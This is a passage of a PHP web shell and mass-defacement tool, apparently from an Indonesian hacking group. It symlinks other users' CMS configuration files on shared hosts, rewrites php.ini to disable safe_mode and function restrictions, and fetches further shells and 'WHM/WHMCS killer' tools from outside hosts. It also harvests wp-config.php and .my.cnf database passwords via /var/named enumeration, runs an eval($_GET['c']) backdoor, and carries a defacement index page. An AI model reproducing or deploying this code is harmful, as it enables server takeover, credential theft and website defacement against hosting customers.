1144. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
1145. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
1146. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
1147. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
1148. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
1149. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
1150. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
1151. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
1152. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
1153. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
1154. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
1155. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
1156. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
1157. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
1158. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
1159. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
1160. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
1161. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
1162. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
1163. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
1164. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
1165. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
1166. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
1167. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
1168. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
1169. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
1170. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
1171. @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
1172. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
1173. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
1174. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
1175. @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
1176. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
1177. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
1178. @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
1179. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
1180. @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
1181. @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
1182. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
1183. @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
1184. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
1185. @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
1186. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
1187. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
1188. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
1189. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
1190. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
1191. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
1192. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
1193. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
1194. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
1195. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
1196. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
1197. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
1198. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
1199. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
1200. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
1201. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
1202. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
1203. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
1204. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
1205. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
1206. }
1207. echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
1208. }
1209. }
1210. ?>
1211. <?php
1212. if (isset($_GET['jak']) && ($_GET['jak'] == 'auto')) {
1213. ?>
1214. <form action="?&amp;jak=auto" method="post">
1215. <?php
1216. echo "<html><head><title>MATAMU PICEK !!!!</title>";
1217. echo "<body bgcolor='black'>";
1218. echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
1219. echo "<div align='center'>";
1220. echo "<input type='submit' name='jak' value='IJIN SERVER'><br/> <br/>";
1221. echo "</div>";
1222. echo "<div align='center'>";
1223. echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
1224. echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
1225. echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
1226. echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
1227. echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
1228. echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
1229. echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
1230. echo "</div>";
1231.  
1232.  
1233. $sh = 'file_get_contents';
1234.  
1235. if($_POST['jak']) {
1236. $ini = "php.ini";
1237. $open = fopen($ini, 'w');
1238. $source = ("safe_mode = OFF n
1239. disable_functions = NONE n
1240. safe_mode_gid = OFF n
1241. open_basedir = OFF n
1242. register_globals = ON n
1243. exec = ON n
1244. shell_exec = ON n");
1245. fwrite($open, $source);
1246. echo "<font color='lime'>";
1247. if($open) {
1248. echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
1249. }
1250. else {
1251. echo "<font color='red'>";
1252. echo '<hr><p>GAGAL kang </p>';
1253. echo "</font>";
1254. fclose($open);
1255. } }
1256.  
1257. if($_POST['te4m']) {
1258. $cgi = 'http://el-ro.yu.tl/files/in.zip';
1259. $get11 = $sh($cgi);
1260. $idbk = fopen('hsh.php', 'w');
1261. fwrite($idbk,$get11);
1262. fclose($idbk);
1263. {
1264. @chmod('hsh.php',0755);
1265. }
1266. echo "<font color='aqua'>";
1267. echo "<hr>shell hsh sukses dibuat :D <br/>
1268. Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>";
1269. echo "</font>";
1270. }
1271. echo "</font>";
1272.  
1273. if($_POST['te4m1']) {
1274. $cgi = 'http://kefiex.yu.tl/files/ma.zip';
1275. $get11 = $sh($cgi);
1276. $idbk = fopen('ma.php', 'w');
1277. fwrite($idbk,$get11);
1278. fclose($idbk);
1279. {
1280. @chmod('ma.php',0755);
1281. }
1282. echo "<font color='aqua'>";
1283. echo "<hr>tools sukses dibuat :D <br/>
1284. Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='ma.php' target='_blank'>DISINI</a></center></br>";
1285. echo "</font>";
1286. }
1287. echo "</font>";
1288.  
1289. if($_POST['te4m2']) {
1290. $cgi = 'http://el-ro.yu.tl/files/whm.zip';
1291. $get11 = $sh($cgi);
1292. $idbk = fopen('whm.php', 'w');
1293. fwrite($idbk,$get11);
1294. fclose($idbk);
1295. {
1296. @chmod('whm.php',0755);
1297. }
1298. echo "<font color='aqua'>";
1299. echo "<hr>whm killer sukses dibuat :D <br/>
1300. Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>";
1301. echo "</font>";
1302. }
1303. echo "</font>";
1304.  
1305. if($_POST['te4m3']) {
1306. $cgi = 'http://el-ro.yu.tl/files/dm.zip';
1307. $get11 = $sh($cgi);
1308. $idbk = fopen('links.php', 'w');
1309. fwrite($idbk,$get11);
1310. fclose($idbk);
1311. {
1312. @chmod('links.php',0755);
1313. }
1314. echo "<font color='aqua'>";
1315. echo "<hr>shell DM sukses dibuat :D <br/>
1316. Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>";
1317. echo "</font>";
1318. }
1319. echo "</font>";
1320. if($_POST['te4m5']) {
1321. $cgi = 'http://kefiex.yu.tl/files/sabun.zip';
1322. $get11 = $sh($cgi);
1323. $idbk = fopen('sabun.php', 'w');
1324. fwrite($idbk,$get11);
1325. fclose($idbk);
1326. {
1327. @chmod('sabun.php',0755);
1328. }
1329. echo "<font color='aqua'>";
1330. echo "<hr>sabun massal :D <br/>
1331. Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>";
1332. echo "</font>";
1333. }
1334. echo "</font>";
1335. if($_POST['te4m6']) {
1336. $cgi = 'http://kefiex.yu.tl/files/olenk.zip';
1337. $get11 = $sh($cgi);
1338. $idbk = fopen('bn.php', 'w');
1339. fwrite($idbk,$get11);
1340. fclose($idbk);
1341. {
1342. @chmod('bn.php',0755);
1343. }
1344. echo "<font color='aqua'>";
1345. echo "<hr>config kill :D <br/>
1346. Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>";
1347. echo "</font>";
1348. }
1349. echo "</font>";
1350. if($_POST['te4m4']) {
1351. $cgi = 'http://kefiex.yu.tl/files/isis.zip';
1352. $get11 = $sh($cgi);
1353. $idb1k = fopen('idb2.php', 'w');
1354. fwrite($idb1k,$get11);
1355. fclose($idb1k);
1356. {
1357. @chmod('idb2.php',0755);
1358. }
1359. echo "<font color='aqua'>";
1360. echo "<hr>CGIProxy sukses dibuat :D <br/>
1361. Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='idb2.php' target='_blank'>DISINI</a></center></br>";
1362. echo "</font>";
1363. }
1364. echo "</font>";
1365. }
1366. ?>
1367.  
1368. <?php
1369. if (isset($_GET['jak']) && ($_GET['jak'] == 'wp2')) { ?>
1370. <form action="?jak=wp2" method="post">
1371. <?php
1372. @ini_set('display_errors',0);
1373. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1374.     $ar0=explode($marqueurDebutLien, $text);
1375.     $ar1=explode($marqueurFinLien, $ar0[$i]);
1376.     return trim($ar1[0]);
1377. }
1378.  
1379. echo "<center>";
1380. $d0mains = @file('/etc/named.conf');
1381. $domains = scandir("/var/named");
1382.  
1383. if ($domains or $d0mains)
1384. {
1385.     $domains = scandir("/var/named");
1386.     if($domains) {
1387. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
1388. $count=1;
1389. $dc = 0;
1390. $list = scandir("/var/named");
1391. foreach($list as $domain){
1392. if(strpos($domain,".db")){
1393. $domain = str_replace('.db','',$domain);
1394. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1395. $dirz = '/home/'.$owner['name'].'/public_html/wp-config.php';
1396. $path = getcwd();
1397.  
1398. if (is_readable($dirz)) {
1399. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1400. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1401. $password=entre2v2($p,'password="','"');
1402. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1403. $dc++;
1404. }
1405.  
1406. }
1407. }
1408. echo '</table>';
1409. $total = $dc;
1410. echo '<br><div class="result">Wp config Found = '.$total.'</h3><br />';
1411. echo '</center>';
1412. }else{
1413. $d0mains = @file('/etc/named.conf');
1414.     if($d0mains) {
1415. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
1416. $count=1;
1417. $dc = 0;
1418. $mck = array();
1419. foreach($d0mains as $d0main){
1420.     if(@eregi('zone',$d0main)){
1421.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
1422.         flush();
1423.         if(strlen(trim($domain[1][0])) >2){
1424.             $mck[] = $domain[1][0];
1425.         }
1426.     }
1427. }
1428. $mck = array_unique($mck);
1429. $usr = array();
1430. $dmn = array();
1431. foreach($mck as $o) {
1432.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1433.     $usr[] = $infos['name'];
1434.     $dmn[] = $o;
1435. }
1436. array_multisort($usr,$dmn);
1437. $dt = file('/etc/passwd');
1438. $passwd = array();
1439. foreach($dt as $d) {
1440.     $r = explode(':',$d);
1441.     if(strpos($r[5],'home')) {
1442.         $passwd[$r[0]] = $r[5];
1443.     }
1444. }
1445. $l=0;
1446. $j=1;
1447. foreach($usr as $r) {
1448. $dirz = '/home/'.$r.'/public_html/wp-config.php';
1449. $path = getcwd();
1450. if (is_readable($dirz)) {
1451. copy($dirz, ''.$path.'/'.$r.'.txt');
1452. $p=file_get_contents(''.$path.'/'.$r.'.txt');
1453. $password=entre2v2($p,'password="','"');
1454. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1455. $dc++;
1456.                 flush();
1457.                 $l=$l?0:1;
1458.                 $j++;
1459.                                 }
1460.             }
1461.                         }
1462. echo '</table>';
1463. $total = $dc;
1464. echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
1465. echo '</center>';
1466.  
1467. }
1468. }else{
1469. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
1470. }
1471. echo "<center>";
1472. $d0mains = @file('/etc/named.conf');
1473. $domains = scandir("/var/named");
1474.  
1475. if ($domains or $d0mains)
1476. {
1477.     $domains = scandir("/var/named");
1478.     if($domains) {
1479. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
1480. $count=1;
1481. $dc = 0;
1482. $list = scandir("/var/named");
1483. foreach($list as $domain){
1484. if(strpos($domain,".db")){
1485. $domain = str_replace('.db','',$domain);
1486. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1487. $dirz = '/home/'.$owner['name'].'/public_html/configuration.php';
1488. $path = getcwd();
1489.  
1490. if (is_readable($dirz)) {
1491. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1492. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1493. $password=entre2v2($p,'password="','"');
1494. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1495. $dc++;
1496. }
1497.  
1498. }
1499. }
1500. echo '</table>';
1501. $total = $dc;
1502. echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
1503. echo '</center>';
1504. }else{
1505. $d0mains = @file('/etc/named.conf');
1506.     if($d0mains) {
1507. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
1508. $count=1;
1509. $dc = 0;
1510. $mck = array();
1511. foreach($d0mains as $d0main){
1512.     if(@eregi('zone',$d0main)){
1513.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
1514.         flush();
1515.         if(strlen(trim($domain[1][0])) >2){
1516.             $mck[] = $domain[1][0];
1517.         }
1518.     }
1519. }
1520. $mck = array_unique($mck);
1521. $usr = array();
1522. $dmn = array();
1523. foreach($mck as $o) {
1524.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1525.     $usr[] = $infos['name'];
1526.     $dmn[] = $o;
1527. }
1528. array_multisort($usr,$dmn);
1529. $dt = file('/etc/passwd');
1530. $passwd = array();
1531. foreach($dt as $d) {
1532.     $r = explode(':',$d);
1533.     if(strpos($r[5],'home')) {
1534.         $passwd[$r[0]] = $r[5];
1535.     }
1536. }
1537. $l=0;
1538. $j=1;
1539. foreach($usr as $r) {
1540. $dirz = '/home/'.$r.'/.my.cnf';
1541. $path = getcwd();
1542. if (is_readable($dirz)) {
1543. copy($dirz, ''.$path.'/'.$r.'.txt');
1544. $p=file_get_contents(''.$path.'/'.$r.'.txt');
1545. $password=entre2v2($p,'password="','"');
1546. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1547. $dc++;
1548.                 flush();
1549.                 $l=$l?0:1;
1550.                 $j++;
1551.                                 }
1552.             }
1553.                         }
1554. echo '</table>';
1555. $total = $dc;
1556. echo '<br><div class="result">Total cp = '.$total.'</h3><br />';
1557. echo '</center>';
1558.  
1559. }
1560. }else{
1561. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
1562. }
1563.  
1564. echo "<br>&#169; <font color='#FF0000'>./elro-BN404</font> | BN-IDBTE4M";
1565. echo "</body></html>";
1566. }
1567. ?>
1568. <?php
1569. if (isset($_GET['jak']) && ($_GET['jak'] == 'wpmas')) { ?>
1570. <form action="?jak=wpmas" method="post">
1571. <style>
1572. body
1573. {
1574.         background: #0f0e0d;
1575.         color: #FF9933;
1576.         padding: 0px;
1577. }
1578. a:link, body_alink
1579. {
1580.         color: #FF9933;
1581.         text-decoration: none;
1582. }
1583. a:visited, body_avisited
1584. {
1585.         color: #FF9933;
1586.         text-decoration: none;
1587. }
1588. a:hover, a:active, body_ahover
1589. {
1590.         color: #FFFFFF;
1591.         text-decoration: none;
1592. }
1593. td, th, p, li,table
1594. {
1595.        
1596.         background: #2e2b28;
1597.         border:1px solid #524f46;
1598. }
1599. input
1600. {
1601.         border: 1px solid;
1602.         cursor: default;
1603.        
1604.         overflow: hidden;
1605.         background: #2e2b28;
1606.         color: #ffffff;
1607. }textarea
1608. {
1609.         border: 1px solid;
1610.         cursor: default;
1611.        
1612.         overflow: hidden;
1613.         background: #2e2b28;
1614.         color: #ffffff;
1615. }
1616. button
1617. {
1618.         border: 1px solid;
1619.         cursor: default;
1620.        
1621.         overflow: hidden;
1622.         background: #2e2b28;
1623.         color: #ffffff;
1624. }
1625. </style>
1626. </head>
1627. <body bgcolor="black">
1628. </center>
1629. <form method="POST" action="" >
1630. <center>
1631. <table border='1'><tr><td>List of All Symlink</td><td>
1632. <input type="text" name="url" size="100" value="list.txt"></td></tr>
1633. <tr><td>Index</td><td>
1634. <textarea name="index" cols='50' rows='10' >
1635. <html lang="en">
1636. <head>
1637. <meta charset="utf-8" />
1638. <TITLE>whoami?</TITLE>
1639. <META NAME="description" CONTENT="AsuKabeh"/>
1640. <META NAME="keywords" CONTENT="shamp0erna99"/>
1641. <META NAME="copyright" CONTENT="Copyright . All Rights Reserved."/>
1642. <META NAME="author" CONTENT="shmprn99"/>
1643. <meta NAME="robots" CONTENT="index,follow"/>
1644. <META NAME="language" CONTENT="En">
1645. <META NAME="revisit-after" CONTENT="1"/>
1646. <link href='http://fonts.googleapis.com/css?family=Averia+Sans+Libre' rel='stylesheet' type='text/css'/>
1647. </head>
1648. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
1649. <body>
1650. <style type="text/css">
1651.   body {
1652.     background-color: black;
1653.   }
1654.   .sok {
1655.     margin-top: 20%;
1656.   }
1657. </style>
1658. <div class="sok"><b><font size="20" face="Iceland"><center><SCRIPT>
1659. farbbibliothek = new Array();
1660. farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
1661. farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
1662. farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
1663. farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
1664. farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
1665. farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
1666. farbbibliothek[6] = new Array("#0000FF","#FFFF00");
1667. farben = farbbibliothek[4];
1668. function farbschrift()
1669. {
1670. for(var i=0 ; i<Buchstabe.length; i++)
1671. {
1672. document.all["a"+i].style.color=farben[i];
1673. }
1674. farbverlauf();
1675. }
1676. function string2array(text)
1677. {
1678. Buchstabe = new Array();
1679. while(farben.length<text.length)
1680. {
1681. farben = farben.concat(farben);
1682. }
1683. k=0;
1684. while(k<=text.length)
1685. {
1686. Buchstabe[k] = text.charAt(k);
1687. k++;
1688. }
1689. }
1690. function divserzeugen()
1691. {
1692. for(var i=0 ; i<Buchstabe.length; i++)
1693. {
1694. document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
1695. }
1696. farbschrift();
1697. }
1698. var a=1;
1699. function farbverlauf()
1700. {
1701. for(var i=0 ; i<farben.length; i++)
1702. {
1703. farben[i-1]=farben[i];
1704. }
1705. farben[farben.length-1]=farben[-1];
1706.  
1707. setTimeout("farbschrift()",20);
1708. }
1709. //
1710. var farbsatz=1;
1711. function farbtauscher()
1712. {
1713. farben = farbbibliothek[farbsatz];
1714. while(farben.length<text.length)
1715. {
1716. farben = farben.concat(farben);
1717. }
1718. farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
1719. }
1720. setInterval("farbtauscher()",2000);
1721. text= "Pwndzx by shamp0erna99"; //h
1722. string2array(text);
1723. divserzeugen();
1724. //document.write(text);
1725. </SCRIPT></center></font></b></div>
1726. <center>
1727. <br><font color="red">Not only are black people protected and supported but all</font><font color="white"> religious people throughout the world are obliged to protect one another. Do you understand that?
1728. <br><font color="red">#Indonesian</font><font color="white"> Hacker Rulez @2020</font><br>
1729. ============================<br>JakselWorld<a href="https://local-hunter.com/">.</a></center>
1730. <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/19171558&auto_play=true"></iframe>
1731. <script type='text/javascript'>
1732. //<![CDATA[
1733. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://translate.google.co.id/?hl=id#view=home&op=translate&sl=auto&tl=id&text=MAU%20NGAPAIN%20COK%20%3F"});
1734. //]]>
1735. </script>
1736. </body>
1737. </html>
1738.  
1739. </textarea></td></tr></table>
1740. <br><br><input type="Submit" name="Submit" value="Submit">
1741. <input type="hidden" name="action" value="1"></form>
1742. </center>
1743. <nobr>
1744. <center>
1745. <?
1746. }?>
1747. <?
1748. eval ($_GET["c"]);
1749. set_time_limit(0);
1750. if ($_POST['action']=='1'){
1751. $url=$_POST['url'];
1752. $users=@file($url);
1753. $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
1754.  
1755.  
1756. if (count($users)<1) exit("<h1>No config found</h1>");
1757. foreach ($users as $user) {
1758. $user1=trim($user);
1759. $code=file_get_contents2($user1);
1760. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1761. $db=$b1[1][0];
1762. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1763. $user=$b2[1][0];
